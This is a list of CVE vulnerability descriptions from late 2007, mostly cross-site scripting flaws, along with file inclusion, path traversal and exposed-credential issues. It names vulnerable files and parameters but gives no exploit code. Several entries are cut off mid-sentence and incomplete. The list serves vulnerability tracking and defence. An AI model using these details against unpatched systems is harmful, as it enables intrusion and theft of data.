[CVE-2007-5979] Cross-site scripting (XSS) vulnerability in download_plugin.php3 in F5 Firepass 4100 SSL VPN 5.4 through 5.5.2 and 6.0 through 6.0.1 allows remote attackers to inject arbitrary web script or HTML via the backurl parameter.
[CVE-2007-5977] Cross-site scripting (XSS) vulnerability in db_create.php in phpMyAdmin before 2.11.2.1 allows remote authenticated users with CREATE DATABASE privileges to inject arbitrary web script or HTML via a hex-encoded IMG element in the db parameter in a POST request, a different vulnerability than CVE-2006-6942.
[CVE-2007-5961] Cross-site scripting (XSS) vulnerability in the Red Hat Network channel search feature, as used in RHN and Red Hat Network Satellite before 5.0.2, allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2007-5955] Cross-site scripting (XSS) vulnerability in updir.php in UPDIR.NET before 2.04 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-5954] Cross-site scripting (XSS) vulnerability in buscador.php in JLMForo System allows remote attackers to inject arbitrary web script or HTML via the clave parameter. NOTE: the provenance of this information is unknown
[CVE-2007-5952] Cross-site scripting (XSS) vulnerability in admin/index.php in Helios Calendar 1.2.1 Beta allows remote attackers to inject arbitrary web script or HTML via the username parameter. NOTE: the provenance of this information is unknown
[CVE-2007-5950] Cross-site scripting (XSS) vulnerability in NetCommons before 1.0.11, and 1.1.x before 1.1.2, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2006-4165.
[CVE-2007-5949] Cross-site scripting (XSS) vulnerability in IBM Tivoli Service Desk 6.2 allows remote authenticated users to inject arbitrary web script or HTML via the Description parameter in a Maximo change action.
[CVE-2007-5948] Multiple cross-site scripting (XSS) vulnerabilities in main.php in SF-Shoutbox 1.2.1 through 1.4 allow remote attackers to inject arbitrary web script or HTML via the (1) nick (aka Name) and (2) shout (aka Shout) parameters.
[CVE-2007-5944] Cross-site scripting (XSS) vulnerability in Servlet Engine / Web Container in IBM WebSphere Application Server (WAS) 5.1.1.4 through 5.1.1.16 allows remote attackers to inject arbitrary web script or HTML via the Expect HTTP header. NOTE: this might be the same issue as CVE-2006-3918, but there are insufficient details to be sure.
[CVE-2007-5934] The LOB functionality in PEAR MDB2 before 2.5.0a1 interprets a request to store a URL string as a request to retrieve and store the contents of the URL, which might allow remote attackers to use MDB2 as an indirect proxy or obtain sensitive information via a URL into a form field in an MDB2 application, as demonstrated by a file:// URL or a URL for an intranet web site.
[CVE-2007-5932] Multiple cross-site scripting (XSS) vulnerabilities in Fatwire Content Server (CS) CMS 6.3.0 allow remote attackers to inject arbitrary web script or HTML via unspecified form fields related to the (1) search function, (2) advanced search function, and possibly other components.
[CVE-2007-5924] Cross-site scripting (XSS) vulnerability in the Web Server (HTTP) task in IBM Lotus Domino before 6.5.6 FP2, and 7.x before 7.0.2 FP2, allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-5923] Cross-site scripting (XSS) vulnerability in forms/smpwservices.fcc in CA (formerly Computer Associates) eTrust SiteMinder Agent allows remote attackers to inject arbitrary web script or HTML via the SMAUTHREASON parameter, a different vector than CVE-2005-2204.
[CVE-2007-5921] Unspecified vulnerability in the ioctl interface in the Solaris Volume Manager (SVM) in Sun Solaris 9 and 10 allows local users to cause a denial of service (panic) via unspecified vectors, a different vulnerability than CVE-2004-1346.
[CVE-2007-5919] MyWebFTP, possibly 5.3.2, stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain an MD5 password hash via a direct request for pass/pass.txt.
[CVE-2007-5891] Multiple cross-site scripting (XSS) vulnerabilities in jsp/Login.do in ManageEngine OpManager MSP Edition and OpManager 7.0 allow remote attackers to inject arbitrary web script or HTML via the (1) requestid, (2) fileid, (3) woMode, and (2) woID parameters. NOTE: the provenance of this information is unknown
[CVE-2007-5888] Cross-site scripting (XSS) vulnerability in displayecard.php in Coppermine Photo Gallery (CPG) before 1.4.14 allows remote attackers to inject arbitrary web script or HTML via the data parameter.
[CVE-2007-5858] WebKit in Safari in Apple Mac OS X 10.4.11 and 10.5.1, iPhone 1.0 through 1.1.2, and iPod touch 1.1 through 1.1.2 allows remote attackers to "navigate the subframes of any other page," which can be leveraged to conduct cross-site scripting (XSS) attacks and obtain sensitive information.
[CVE-2007-5834] Cross-site scripting (XSS) vulnerability in BosDev BosNews 4 allows remote attackers to inject arbitrary web script or HTML via a SCRIPT element in a news post.
[CVE-2007-5833] Multiple cross-site scripting (XSS) vulnerabilities in BosDev BosMarket Business Directory System allow remote authenticated users to inject arbitrary web script or HTML via (1) user info (account details) or (2) a post.
[CVE-2007-5830] Unspecified vulnerability in the administrative interface in Avaya Messaging Storage Server (MSS) 3.1 before SP1, and Message Networking (MN) 3.1, allows remote attackers to cause a denial of service via unspecified vectors related to "input validation."
[CVE-2007-5825] Format string vulnerability in the ws_addarg function in webserver.c in mt-dappd in Firefly Media Server 0.2.4 and earlier allows remote attackers to execute arbitrary code via a stats method action to /xml-rpc with format string specifiers in the (1) username or (2) password portion of base64-encoded data on the "Authorization: Basic" HTTP header line.
[CVE-2007-5824] webserver.c in mt-dappd in Firefly Media Server 0.2.4 and earlier allows remote attackers to cause a denial of service (NULL dereference and daemon crash) via a stats method action to /xml-rpc with (1) an empty Authorization header line, which triggers a crash in the ws_decodepassword function
[CVE-2007-5815] Absolute path traversal vulnerability in the WebCacheCleaner ActiveX control 1.3.0.3 in SonicWall SSL-VPN 200 before 2.1, and SSL-VPN 2000/4000 before 2.5, allows remote attackers to delete arbitrary files via a full pathname in the argument to the FileDelete method.
[CVE-2007-5810] Hitachi Web Server 01-00 through 03-00-01, as used by certain Cosminexus products, does not properly validate SSL client certificates, which might allow remote attackers to spoof authentication via a client certificate with a forged signature.
[CVE-2007-5809] Cross-site scripting (XSS) vulnerability in Hitachi Web Server 01-00 through 03-10, as used by certain Cosminexus products, allows remote attackers to inject arbitrary web script or HTML via unspecified HTTP requests that trigger creation of a server-status page.
[CVE-2007-5808] Unspecified vulnerability in the Groupmax Collaboration - Schedule component in Hitachi Groupmax Collaboration Portal 07-30 through 07-30-/F and 07-32 through 07-32-/C, uCosminexus Collaboration Portal 06-30 through 06-30-/F and 06-32 through 06-32-/C, and Groupmax Collaboration Web Client - Mail/Schedule 07-30 through 07-30-/F and 07-32 through 07-32-/B might allow remote attackers to obtain sensitive information via unspecified vectors related to schedule portlets.
[CVE-2007-5806] Cross-site scripting (XSS) vulnerability in Services/Utilities/classes/class.ilUtil.php in ILIAS 3.8.3 and earlier allows remote attackers to inject arbitrary web script or HTML via attributes inside a domain-name string in the (1) mailing or (2) forum component, as demonstrated using the style and onmouseover HTML attributes.
[CVE-2007-5803] Multiple cross-site scripting (XSS) vulnerabilities in CGI programs in Nagios before 2.12 might allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2007-5624 and CVE-2008-1360.
[CVE-2007-5799] Multiple cross-site request forgery (CSRF) vulnerabilities in uddigui/navigateTree.do in the UDDI user console in IBM WebSphere Application Server (WAS) before 6.1.0 Fix Pack 13 (6.1.0.13) allow remote attackers to perform some actions as WAS UDDI users via the (1) keyField, (2) nameField, (3) valueField, and (4) frameReturn parameters.
[CVE-2007-5798] Multiple cross-site scripting (XSS) vulnerabilities in uddigui/navigateTree.do in the UDDI user console in IBM WebSphere Application Server (WAS) before 6.1.0 Fix Pack 13 (6.1.0.13) allow remote attackers to inject arbitrary web script or HTML via the (1) keyField, (2) nameField, (3) valueField, and (4) frameReturn parameters.
[CVE-2007-5796] Cross-site scripting (XSS) vulnerability in the management console in Blue Coat ProxySG before 4.2.6.1, and 5.x before 5.2.2.5, allows remote attackers to inject arbitrary web script or HTML by modifying the URL that is used for loading Certificate Revocation Lists.
[CVE-2007-5787] Micro Login System 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a file containing a password via a direct request for userpwd.txt.
[CVE-2007-5779] Buffer overflow in the GomManager (GomWeb Control) ActiveX control in GomWeb3.dll 1.0.0.12 in Gretech Online Movie Player (GOM Player) 2.1.6.3499 allows remote attackers to execute arbitrary code via a long argument to the OpenUrl method.
[CVE-2007-5777] Blue-Collar Productions i-Gallery 3.4 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a file containing a base64-encoded password via a direct request for igallery.mdb.
[CVE-2007-5770] The (1) Net::ftptls, (2) Net::telnets, (3) Net::imap, (4) Net::pop, and (5) Net::smtp libraries in Ruby 1.8.5 and 1.8.6 do not verify that the commonName (CN) field in a server certificate matches the domain name in a request sent over SSL, which makes it easier for remote attackers to intercept SSL transmissions via a man-in-the-middle attack or spoofed web site, different components than CVE-2007-5162.
[CVE-2007-5761] The NantSys device 5.0.0.115 in Motorola netOctopus 5.1.2 build 1011 has weak permissions for the \\.\NantSys device interface (nantsys.sys), which allows local users to gain privileges or cause a denial of service (system crash), as demonstrated by modifying the SYSENTER_EIP_MSR CPU Model Specific Register (MSR) value.
[CVE-2007-5735] eFileMan 7.1.0.87-88 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain unspecified user information via a direct request for cgi-bin/efileman/efileman_config.pm.
[CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
[CVE-2007-5728] Cross-site scripting (XSS) vulnerability in phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, different vectors than CVE-2007-2865.
[CVE-2007-5727] Incomplete blacklist vulnerability in the stripScripts function in common.php in OneOrZero Helpdesk 1.6.5.4, 1.6.4.2, and possibly other versions, allows remote attackers to conduct cross-site scripting (XSS) attacks and inject arbitrary web script or HTML via XSS sequences without SCRIPT tags in the description parameter to (1) tcreate.php or (2) tupdate.php, as demonstrated using an onmouseover event in a b tag.
[CVE-2007-5725] Multiple cross-site scripting (XSS) vulnerabilities in Smart-Shop allow remote attackers to inject arbitrary web script or HTML via (1) the email parameter to index.php
[CVE-2007-5724] Multiple cross-site scripting (XSS) vulnerabilities in Omnistar Live allow remote attackers to inject arbitrary web script or HTML via (1) the category_id parameter to users/kb.php, and possibly (3) the Email Box field in profile.php.
[CVE-2007-5710] Cross-site scripting (XSS) vulnerability in wp-admin/edit-post-rows.php in WordPress 2.3 allows remote attackers to inject arbitrary web script or HTML via the posts_columns array parameter.
[CVE-2007-5702] Cross-site scripting (XSS) vulnerability in swamp/action/LoginActions (aka the login box) in the Novell OpenSUSE SWAMP Workflow Administration and Management Platform 1.x allows remote attackers to inject arbitrary web script or HTML via the username parameter. NOTE: some of these details are obtained from third party information.
[CVE-2007-5698] Cross-site scripting (XSS) vulnerability in default.asp in CREApark GOLD KOY PORTALI allows remote attackers to inject arbitrary web script or HTML via the aranan parameter. NOTE: the provenance of this information is unknown
[CVE-2007-5695] Open redirect vulnerability in command.php in SiteBar 3.3.8 allows remote attackers to redirect users to arbitrary web sites via a URL in the forward parameter in a Log In action.
[CVE-2007-5692] Multiple cross-site scripting (XSS) vulnerabilities in SiteBar 3.3.8 allow remote attackers to inject arbitrary web script or HTML via (1) the lang parameter to integrator.php
[CVE-2007-5690] ** DISPUTED ** Buffer overflow in sethdlc.c in the Asterisk Zaptel 1.4.5.1 might allow local users to gain privileges via a long device name (interface name) in the ifr_name field. NOTE: the vendor disputes this issue, stating that the application requires root access, so privilege boundaries are not crossed.
[CVE-2007-5685] The safe_path function in shttp before 0.0.5 allows remote attackers to conduct directory traversal attacks and read files via a combination of ".." and sub-directory specifiers that resolve to a pathname that is at or below the same level as the web document root, but in a different part of the directory tree.
[CVE-2007-5683] Multiple cross-site scripting (XSS) vulnerabilities in TikiWiki 1.9.8.1 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the username parameter to the password reminder page (tiki-remind_password.php), (2) IMG tags in wiki pages, and (3) the local_php parameter to db/tiki-db.php.
[CVE-2007-5677] Cross-site scripting (XSS) vulnerability in shoutbox/blocco.php in Hackish BETA 1.1 allows remote attackers to inject arbitrary web script or HTML via the go_shout parameter.
[CVE-2007-5673] Cross-site scripting (XSS) vulnerability in cgi-bin/webif.exe in ifnet WebIf allows remote attackers to inject arbitrary web script or HTML via the cmd parameter.
[CVE-2007-5660] Unspecified vulnerability in the Update Service ActiveX control in isusweb.dll before 6.0.100.65101 in MacroVision FLEXnet Connect and InstallShield 2008 allows remote attackers to execute arbitrary code via an unspecified "unsafe method," possibly involving a buffer overflow.
[CVE-2007-5654] LiteSpeed Web Server before 3.2.4 allows remote attackers to trigger use of an arbitrary MIME type for a file via a "%00." sequence followed by a new extension, as demonstrated by reading PHP source code via requests for .php%00.txt files, aka "Mime Type Injection."
[CVE-2007-5649] Cross-site scripting (XSS) vulnerability in lostpwd.php in Creative Digital Resources SocketMail 2.2.1 allows remote attackers to inject arbitrary web script or HTML via the lost_id parameter.
[CVE-2007-5648] Multiple cross-site scripting (XSS) vulnerabilities in rnote.php in rNote 0.9.7.5 allow remote attackers to inject arbitrary web script or HTML via the (1) d or the (2) u parameter.
[CVE-2007-5647] Multiple cross-site scripting (XSS) vulnerabilities in SocketKB 1.1.5 allow remote attackers to inject arbitrary web script or HTML via the (1) art_id or (2) node parameter in an article action to the default URI.
[CVE-2007-5629] Cross-site scripting (XSS) vulnerability in admin/logon.asp in ShoppingTree CandyPress Store 4.1 allows remote attackers to inject arbitrary web script or HTML via the msg parameter, a different vector than CVE-2007-2804. NOTE: the provenance of this information is unknown
[CVE-2007-5628] PHP remote file inclusion vulnerability in src/scripture.php in The Online Web Library Site (TOWels) 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the pageHeaderFile parameter.
[CVE-2007-5625] Cross-site scripting (XSS) vulnerability in filename.asp in ASP Site Search SearchSimon Lite 1.0 allows remote attackers to inject arbitrary web script or HTML via the QUERY parameter.
[CVE-2007-5624] Cross-site scripting (XSS) vulnerability in Nagios 2.x before 2.10 allows remote attackers to inject arbitrary web script or HTML via unknown vectors to unspecified CGI scripts.
[CVE-2007-5613] Cross-site scripting (XSS) vulnerability in Dump Servlet in Mortbay Jetty before 6.1.6rc1 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters and cookies.
[CVE-2007-5598] Cross-site scripting (XSS) vulnerability in Weblinks for Drupal 4.7.x before 4.7.x-1.0 and 5.x before 5.x-1.8 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-5589] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin before 2.11.1.2 allow remote attackers to inject arbitrary web script or HTML via certain input available in (1) PHP_SELF in (a) server_status.php, and (b) grab_globals.lib.php, (c) display_change_password.lib.php, and (d) common.lib.php in libraries/
[CVE-2007-5588] Cross-site scripting (XSS) vulnerability in mnoGoSearch before 3.2.43 allows remote attackers to inject arbitrary web script or HTML via the t parameter in search.cgi, as reachable from search.htm-dist.
[CVE-2007-5582] Cross-site scripting (XSS) vulnerability in the login page in Cisco CiscoWorks Server (CS), possibly 2.6 and earlier, when using CiscoWorks Common Services 3.0.x and 3.1, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-5581] Multiple cross-site scripting (XSS) vulnerabilities in mpweb/scripts/mpx.dll in Cisco Unified MeetingPlace 5.4 and earlier and 6.0 allow remote attackers to inject arbitrary web script or HTML via the (1) FirstName and (2) LastName parameters.
[CVE-2007-5578] Basic Analysis and Security Engine (BASE) before 1.3.8 sends a redirect to the web browser but does not exit, which allows remote attackers to bypass authentication via (1) base_main.php, (2) base_qry_alert.php, and possibly other vectors.
[CVE-2007-5577] Multiple cross-site scripting (XSS) vulnerabilities in Joomla! before 1.0.13 (aka Sunglow) allow remote attackers to inject arbitrary web script or HTML via the (1) Title or (2) Section Name form fields in the Section Manager component, or (3) multiple unspecified fields in New Menu Item.
[CVE-2007-5576] BEA Tuxedo 8.0 before RP392 and 8.1 before RP293, and WebLogic Enterprise 5.1 before RP174, echo the password in cleartext, which allows physically proximate attackers to obtain sensitive information via the (1) cnsbind, (2) cnsunbind, or (3) cnsls commands.
[CVE-2007-5564] Multiple cross-site scripting (XSS) vulnerabilities in NSSboard (formerly Simple PHP Forum) 6.1 allow remote attackers to inject arbitrary web script or HTML via (1) HTML tags when BBcode is disabled
[CVE-2007-5562] Cross-site scripting (XSS) vulnerability in cgi-bin/welcome (aka the login page) in Netgear SSL312 PROSAFE SSL VPN-Concentrator 25 allows remote attackers to inject arbitrary web script or HTML via the err parameter in the context of an error page.
[CVE-2007-5547] Cross-site scripting (XSS) vulnerability in Cisco IOS allows remote attackers to inject arbitrary web script or HTML, and execute IOS commands, via unspecified vectors, aka PSIRT-2022590358. NOTE: as of 20071016, the only disclosure is a vague pre-advisory with no actionable information. However, since it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes.
[CVE-2007-5531] Unspecified vulnerability in Oracle Help for Web, as used in Oracle Application Server, Oracle Database 10.2.0.3, and Enterprise Manager 10.1.0.6, has unknown impact and remote attack vectors, aka EM02.
[CVE-2007-5529] Unspecified vulnerability in the Oracle Self-Service Web Applications component in client-only installations of Oracle E-Business Suite 11.5.10.2 has unknown impact and remote attack vectors, aka APP08.
[CVE-2007-5496] Cross-site scripting (XSS) vulnerability in setroubleshoot 2.0.5 allows local users to inject arbitrary web script or HTML via a crafted (1) file or (2) process name, which triggers an Access Vector Cache (AVC) log entry in a log file used during composition of HTML documents for sealert.
[CVE-2007-5483] Unspecified vulnerability in the Administrative Scripting Tools (such as wsadmin or ANT) in IBM WebSphere Application Server 5.x and 6.0.x has unknown impact and attack vectors.
[CVE-2007-5482] Unspecified vulnerability in the FTP service in Sun StorEdge/StorageTek 3510 FC Array with firmware before 4.21 allows remote attackers, with access to the Ethernet management interface, to cause a denial of service (I/O request timeout and device hang) via unspecified vectors.
[CVE-2007-5480] Multiple cross-site scripting (XSS) vulnerabilities in InnovaAge InnovaShop allow remote attackers to inject arbitrary web script or HTML via the (1) msg parameter to msg.jsp, and the (2) contentid parameter to tc/contents/home001.jsp.
[CVE-2007-5479] Cross-site scripting (XSS) vulnerability in Search.asp in Xcomputer allows remote attackers to inject arbitrary web script or HTML via the EXPS parameter.
[CVE-2007-5478] Cross-site scripting (XSS) vulnerability in projects in Nabh Stringbeans Portal (sbportal) 3.2 allows remote attackers to inject arbitrary web script or HTML via the project_name parameter.
[CVE-2007-5477] Cross-site scripting (XSS) vulnerability in auth.w in djeyl.net WebMod 0.48 Half-Life Dedicated Server plugin allows remote attackers to inject arbitrary web script or HTML via the redir parameter.
[CVE-2007-5473] StaticFileHandler.cs in System.Web in Mono before 1.2.5.2, when running on Windows, allows remote attackers to obtain source code of sensitive files via a request containing a trailing (1) space or (2) dot, which is not properly handled by XSP.
[CVE-2007-5472] Cross-site scripting (XSS) vulnerability in the Server component in CA Host-Based Intrusion Prevention System (HIPS) before 8.0.0.93 allows remote attackers to inject arbitrary web script or HTML via requests that are written to logs for later display in the log viewer.
[CVE-2007-5463] ideal_process.php in the iDEAL payment module in ViArt Shop 3.3 beta and earlier might allow remote attackers to obtain the pathname for certificate and key files via an "iDEAL transaction", possibly involving fopen error messages for nonexistent files, a different issue than CVE-2007-5364. NOTE: this can be leveraged for reading certificate or key files if an installation places these files under the web document root.
[CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
[CVE-2007-5459] Cross-site scripting (XSS) vulnerability in the sidebar HTML page in the MouseoverDictionary before 0.6.2 extension for Mozilla Firefox allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-5455] Cross-site scripting (XSS) vulnerability in wxis.exe in WWWISIS 7.1 and earlier allows remote attackers to inject arbitrary web script or HTML via a call to the iah/iah.xis IsisScript code, possibly involving the lang or exprSearch parameter.
[CVE-2007-5443] Multiple cross-site scripting (XSS) vulnerabilities in CMS Made Simple 1.1.3.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to (1) the anchor tag and (2) listtags.
[CVE-2007-5437] The web console in CA (formerly Computer Associates) eTrust ITM (Threat Manager) 8.1 allows remote attackers to redirect users to arbitrary web sites via a crafted HTTP URL on port 6689.
[CVE-2007-5434] Cross-site scripting (XSS) vulnerability in PRO-search 0.17.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the q parameter to the default URI.
[CVE-2007-5433] Multiple cross-site scripting (XSS) vulnerabilities in index.cgi in Site-Up 2.64 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) search or (2) search mask field.
[CVE-2007-5429] Cross-site scripting (XSS) vulnerability in index.php in Nucleus 3.01 allows remote attackers to inject arbitrary web script or HTML via the archive parameter.
[CVE-2007-5428] Cross-site scripting (XSS) vulnerability in UMI CMS allows remote attackers to inject arbitrary web script or HTML via the search_string parameter to the default URI in search_do/.
[CVE-2007-5427] Cross-site scripting (XSS) vulnerability in the com_search component in Joomla! 1.0.13 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchword parameter. NOTE: this might be related to CVE-2007-4189.1.
[CVE-2007-5426] Multiple cross-site scripting (XSS) vulnerabilities in ActiveKB NX 2.5.4 allow remote attackers to inject arbitrary web script or HTML via the page parameter to the default URI for some directories, as demonstrated by (1) ActiveKB/ and (2) default/categories/ActiveKB/.
[CVE-2007-5420] The 3Com 3CRWER100-75 router with 1.2.10ww software, when remote management is disabled but a web server has been configured, serves a web page to external clients, which might allow remote attackers to obtain information about the router's existence and product details.
[CVE-2007-5415] Cross-site scripting (XSS) vulnerability in Mozilla Firefox 2.0, when UTF-7 document content is rendered directly in UTF-7, allows remote attackers to inject arbitrary web script or HTML via a gopher URI that uses '/' (slash) characters to delimit a literal string within an XSS sequence, a related issue to CVE-2007-5414.
[CVE-2007-5414] Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 2.0, when UTF-7 document content is rendered directly in UTF-7, allows remote attackers to inject arbitrary web script or HTML via a gopher URI that uses single quote characters to delimit a literal string within an XSS sequence, a related issue to CVE-2007-5415.
[CVE-2007-5411] Cross-site scripting (XSS) vulnerability in the Linksys SPA941 VoIP Phone with firmware 5.1.8 allows remote attackers to inject arbitrary web script or HTML via the From header in a SIP message.
[CVE-2007-5410] PHP remote file inclusion vulnerability in admin.wmtrssreader.php in the webmaster-tips.net Flash RSS Reader (com_wmtrssreader) 1.0 component for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_live_site parameter.
[CVE-2007-5403] Multiple cross-site scripting (XSS) vulnerabilities in Layton HelpBox 3.7.1 allow remote authenticated users to inject arbitrary web script or HTML via the (1) Forename, (2) Surname, (3) Telephone, and (4) Fax fields to writeenduserenduser.asp
[CVE-2007-5388] Multiple PHP remote file inclusion vulnerabilities in WebDesktop 0.1 allow remote attackers to execute arbitrary PHP code via a URL in the (1) app parameter to apps/apps.php and the (2) wsk parameter to wsk/wsk.php.
[CVE-2007-5386] Cross-site scripting (XSS) vulnerability in scripts/setup.php in phpMyAdmin 2.11.1, when accessed by a browser that does not URL-encode requests, allows remote attackers to inject arbitrary web script or HTML via the query string.
[CVE-2007-5385] Multiple cross-site scripting (XSS) vulnerabilities in the Thomson/Alcatel SpeedTouch 7G router, as used for the BT Home Hub 6.2.6.B and earlier, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-5380] Session fixation vulnerability in Rails before 1.2.4, as used for Ruby on Rails, allows remote attackers to hijack web sessions via unspecified vectors related to "URL-based sessions."
[CVE-2007-5375] Interpretation conflict in the Sun Java Virtual Machine (JVM) allows user-assisted remote attackers to conduct a multi-pin DNS rebinding attack and execute arbitrary JavaScript in an intranet context, when an intranet web server has an HTML document that references a "mayscript=true" Java applet through a local relative URI, which may be associated with different IP addresses by the browser and the JVM.
[CVE-2007-5370] Multiple cross-site scripting (XSS) vulnerabilities in cgi-bin/dnewsweb.exe in NetWin DNewsWeb (DNews News Server) 57e1 allow remote attackers to inject arbitrary web script or HTML via the (1) group or (2) utag parameter.
[CVE-2007-5366] The Tomcat 4.1-based Servlet Service in Fujitsu Interstage Application Server 7.0 through 9.0.0 and Interstage Apworks/Studio 7.0 through 9.0.0 allows remote attackers to obtain sensitive information (web root path) via unspecified vectors that trigger an error message, probably related to enabling the useCanonCaches Java Virtual Machine (JVM) option.
[CVE-2007-5355] The Web Proxy Auto-Discovery (WPAD) feature in Microsoft Internet Explorer 6 and 7, when a primary DNS suffix with three or more components is configured, resolves an unqualified wpad hostname in a second-level domain outside this configured DNS domain, which allows remote WPAD servers to conduct man-in-the-middle (MITM) attacks.
[CVE-2007-5344] Microsoft Internet Explorer 5.01 through 7 allows remote attackers to execute arbitrary code via a crafted website using Javascript that creates, modifies, deletes, and accesses document objects using the tags property, which triggers heap corruption, related to uninitialized or deleted objects, a different issue than CVE-2007-3902 and CVE-2007-3903, and a variant of "Uninitialized Memory Corruption Vulnerability."
[CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
[CVE-2007-5337] Mozilla Firefox before 2.0.0.8 and SeaMonkey before 1.1.5, when running on Linux systems with gnome-vfs support, might allow remote attackers to read arbitrary files on SSH/sftp servers that accept key authentication by creating a web page on the target server, in which the web page contains URIs with (1) smb: or (2) sftp: schemes that access other files from the server.
[CVE-2007-5327] Stack-based buffer overflow in the RPC interface for the Message Engine (mediasvr.exe) in CA BrightStor ARCServe BackUp v9.01 through R11.5, and Enterprise Backup r10.5, allows remote attackers to execute arbitrary code via a long argument in the 0x10d opnum.
[CVE-2007-5318] Unspecified vulnerability in preview.php in TYPOlight webCMS 2.4.6 allows remote attackers to download arbitrary files via the src parameter. NOTE: the provenance of this information is unknown
[CVE-2007-5314] PHP remote file inclusion vulnerability in system/funcs/xkurl.php in xKiosk WEB 3.0.1i, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the PEARPATH parameter.
[CVE-2007-5312] Cross-site scripting (XSS) vulnerability in TorrentTrader Classic 1.07 allows remote attackers to inject arbitrary web script or HTML via the (1) color parameter to pjirc/css.php and the (2) cat parameter to browse.php.
[CVE-2007-5310] PHP remote file inclusion vulnerability in admin.wmtportfolio.php in the webmaster-tips.net wmtportfolio 1.0 (com_wmtportfolio) component for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
[CVE-2007-5309] PHP remote file inclusion vulnerability in admin.wmtgallery.php in the webmaster-tips.net Flash Image Gallery (com_wmtgallery) 1.0 component for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_live_site parameter.
[CVE-2007-5304] Multiple cross-site scripting (XSS) vulnerabilities in ELSEIF CMS Beta 0.6 allow remote attackers to inject arbitrary web script or HTML via the (1) repertimage parameter to utilisateurs/vousetesbannis.php, the (2) elseifvotetxtresultatduvote parameter to utilisateurs/votesresultats.php, and the (3) elseifforumtxtmenugeneraleduforum parameter to moduleajouter/depot/adminforum.php.
[CVE-2007-5303] Cross-site scripting (XSS) vulnerability in news_page.php in SnewsCMS Rus 2.1 allows remote attackers to inject arbitrary web script or HTML via the page_id parameter.
[CVE-2007-5302] Multiple cross-site scripting (XSS) vulnerabilities in HP System Management Homepage (SMH) in HP-UX B.11.11, B.11.23, and B.11.31, and SMH before 2.1.10 for Linux and Windows, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-5297] Cross-site scripting (XSS) vulnerability in index.php in Minki 1.30 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2007-5296] Multiple cross-site scripting (XSS) vulnerabilities in dblisttest.asp in dbList 8.1 allow remote attackers to inject arbitrary web script or HTML via the (1) db, (2) pagesize, (3) sort, (4) strKeyWords, and (5) table parameters. NOTE: some of these details are obtained from third party information.
[CVE-2007-5295] Multiple cross-site scripting (XSS) vulnerabilities in index.php in (a) Wikepage Opus 13 2007.2 and (b) TipiWiki 2 allow remote attackers to inject arbitrary web script or HTML via the (1) PageContent and (2) PageName parameters.
[CVE-2007-5293] Multiple cross-site scripting (XSS) vulnerabilities in IDMOS 1.0-beta (aka Phoenix) allow remote attackers to inject arbitrary web script or HTML via the (1) err_msg parameter to error.php and the (2) content parameter to templates/simple/ia.php.
[CVE-2007-5292] Cross-site scripting (XSS) vulnerability in photos.cfm in Directory Image Gallery 1.1 allows remote attackers to inject arbitrary web script or HTML via the backwardDirectory parameter.
[CVE-2007-5291] Cross-site scripting (XSS) vulnerability in Edit.asp in DB Manager 2.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2007-5290] Multiple cross-site scripting (XSS) vulnerabilities in MailBee WebMail Pro 3.4 and earlier
[CVE-2007-5282] Hitachi Cosminexus Agent 03-00 through 03-05, and Cosminexus Library Standard and Web Edition 04-00 and 04-01, might allow remote attackers to cause a denial of service (agent process crash) via invalid data from clients other than Cosminexus Manager.
[CVE-2007-5280] Multiple cross-site scripting (XSS) vulnerabilities in messages.jsp in AppFuse before 2.0 Final allow remote attackers to inject arbitrary web script or HTML via unspecified input that is recorded in (1) success or (2) error messages.
[CVE-2007-5278] Zomplog 3.8.1 and earlier stores potentially sensitive information under the web root with insufficient access control, which allows remote attackers to download files that were uploaded by users, as demonstrated by obtaining a directory listing via a direct request to /upload and then retrieving individual files. NOTE: in a non-default configuration, the directory listing is denied, but filenames may be predictable.
